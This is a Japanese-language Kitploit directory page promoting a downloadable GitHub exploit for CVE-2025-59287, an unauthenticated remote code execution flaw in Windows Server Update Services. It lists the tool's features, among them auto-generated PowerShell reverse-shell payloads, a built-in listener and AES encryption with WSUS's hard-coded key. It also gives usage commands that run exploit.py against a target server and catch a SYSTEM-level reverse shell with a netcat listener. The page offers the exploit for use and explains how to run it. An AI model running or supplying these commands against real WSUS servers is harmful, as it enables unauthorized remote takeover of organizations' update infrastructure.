Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59287 — CVE-2025-59287の自動エクスプロイト。WSUSにおける未認証のRCEであり、ペイロード生成、リバースシェルリスナー、ハードコードされたキーによるAES暗号化を備えています。 | Kitploit
ツール/GitHubGitHub/garvitv14/cve-2025-59287
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

CVE-2025-59287の自動エクスプロイト。WSUSにおける未認証のRCEであり、ペイロード生成、リバースシェルリスナー、ハードコードされたキーによるAES暗号化を備えています。

リポジトリを見る
16210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59287 WSUS RCE エクスプロイト

Windows Server Update Services (WSUS) の未認証リモートコード実行の脆弱性に対する自動化エクスプロイト。

脆弱性の詳細

  • CVE ID: CVE-2025-59287
  • CVSS スコア: 9.8 (Critical)
  • 攻撃ベクトル: ネットワーク
  • 認証: 不要
  • 影響: SYSTEM としてのリモートコード実行

機能

✅ 完全自動化されたペイロード生成
✅ ysoserial.NET 依存関係の自動ダウンロード
✅ 内蔵リバースシェルリスナー
✅ クロスプラットフォーム対応 (Windows/Linux/Mac)
✅ WSUS ハードコード鍵による AES 暗号化
✅ PowerShell リバースシェルペイロード

要件

pip install -r requirements.txt

Python 依存関係

.NET ランタイム (自動検出)

  • Windows: .NET Framework (内蔵)
  • Linux/Mac: Wine または Mono Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete

インストール

エクスプロイトファイルをクローンまたはダウンロード

cd CVE-2025-59287-exploit

エクスプロイトを実行 (ysoserial.NET を自動ダウンロード)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

使用方法

基本的なエクスプロイト

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

別のリスナーでセッションを取得したい場合

ターミナル 1: netcat リスナーを起動

nc -lvnp 4444

ターミナル 2: 内蔵リスナーなしでエクスプロイトを実行

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

ツールをダウンロード